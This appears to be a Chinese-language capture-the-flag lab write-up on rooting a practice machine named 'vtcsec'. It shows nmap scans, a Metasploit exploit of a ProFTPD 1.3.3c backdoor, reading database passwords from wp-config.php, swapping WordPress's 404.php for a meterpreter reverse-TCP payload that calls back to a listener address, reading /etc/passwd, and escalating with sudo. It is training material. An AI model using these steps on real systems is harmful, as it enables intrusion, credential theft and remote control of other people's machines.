靶場奪旗及ftp漏洞
經驗:nmap -p- t4 ip 可以掃瞄到未知埠
nmap -a -vt ip 快速掃瞄
對靶場的敏感資訊探測:
一定要仔細看有沒有robots.txt。太重要了,第一次就漏掉了!
nc ip port
本例當中的大埠有:22222 13337 60000
ssh -p 22222 username@ip進行登入
dirb
nikto
有時ssh不能直接連到22埠,此時看是否有其他開放的ssh埠
可以:ssh -p 22222 username@ip進行登入
對ftp伺服器:
用searchsploit命令
看一下txt檔案內容
cat /usr/share/exploitdb/exploits/linux/remote/15662.txt
我們利用metasploit中的對應功能進行滲透。
在msfconsole中直接利用proftpd 1.3.3c漏洞,search一下找到相關exploit
直接拿下,許可權是root。
python -c "import pty;pty.spawn('/bin/bash')" #出現命令提示符,看著比較舒服
另外一套思路:前提是登入靶機,不論以什麼使用者
發現有wordpress:位址為:http://vtcsec/secret/wp-login.php
cat /var/www/html/secret/wp-config.php
// ** mysql settings - you can get this info from your web host ** //mysql -uroot -p -h localhost 進入資料庫,找wordpress應用的合法使用者名稱和密碼。/** the name of the database for wordpress */
define('db_name', 'wp_myblog');
/** mysql database username */
define('db_user', 'root');
/** mysql database password */
define('db_password', 'arootmysqlpass');
/** mysql hostname */
define('db_host', 'localhost');
/** database charset to use in creating database tables. */
define('db_charset', 'utf8');
/** the database collate type. don't change this if in doubt. */
define('db_collate', '');
靠,密碼是數字摘要生成的。考慮彩虹表。
但是,這是我想起了弱口令,admin 123456 000000
在wordpress中,替換404.php。
在msf中:
use exploit/multi/handler(設定使用的大炮)
set payload php/meterpreter/reverse_tcp(設定使用的炮彈)
set lhost 10.10.10.130(設定監聽位址)
exploit
瀏覽:反射成功。
cat /etc/passwd
有乙個普通使用者:猜測弱口令:marlinspike,與使用者一樣。
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
sudo -l 列出marlinspike的提權的許可權
sudo su - 提公升為root許可權
本例中需要對位址進行解析
在/etc/hosts中加入ip位址對映關係
10.10.10.139 vtcsec
我的CTF學習與教學之旅筆記11
目錄遍歷 提權root許可權 web安全提權 核心漏洞提權 檢視發行版本 etc issue etc release uname a 如 searchsploit ubuntu 12.04.5 查詢載荷 如果有合適的載荷,則可以進行核心溢位,否則不行 提權方法一 破解linux使用者密碼步驟 uns...
我的CTF之旅(一)
最近迷上了ctf capture the flag 刷題,話不多說,開始記錄我的ctf之旅 pico ctf 2013 client side is the best side 75 開啟頁面 看描述應該要輸入密碼,檢視網頁源 找到一段js 發現可以直接找到成功的頁面,開啟連線獲得key yummy...
開通部落格,開始我的學習筆記之旅
先熟悉下部落格的格式和書寫方式。本markdown編輯器使用stackedit修改而來,用它寫部落格,將會帶來全新的體驗哦 markdown 是一種輕量級標記語言,它允許人們使用易讀易寫的純文字格式編寫文件,然後轉換成格式豐富的html頁面。維基百科 使用簡單的符號標識不同的標題,將某些文字標記為粗...